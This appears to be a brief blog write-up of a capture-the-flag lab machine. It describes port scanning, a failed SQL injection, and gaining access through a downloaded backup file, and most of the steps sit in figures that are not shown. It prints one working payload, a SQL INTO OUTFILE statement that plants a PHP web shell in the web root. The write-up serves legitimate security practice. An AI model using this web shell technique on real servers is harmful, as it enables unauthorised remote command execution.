Hacking the Margheriti-Server — PwntillDawn CTF

Figure 1

Recon&Scanning

I began the attack by doing some active reconnaissance on the web application using the Nmap command “ nmap -p 1–65535 -T4 -A -v 10.150.150.145”, which scans through all 65535 ports providing info on open ports and services running on them.

Figure 2
Figure 3
Figure 4
Figure 5

Login Bypass

Based on the recon done earlier, I tried out some SQLi attacks using the login parameters — had no luck there. So I decided to go back to the content of “backup.zip” file (see Figure 6) I downloaded and have a second look at it.

Figure 6
Figure 7
Figure 8

Gaining Shell Access/RCE

Now ultimately, the goal is to gain shell access/run commands on the remote server. So leveraging the DB access I run the following script: SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/cmd.php” which injected the file “cmd.php” into the html folder.

Figure 9
Figure 10
Figure 11
Figure 12
Figure 13

Contact :

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store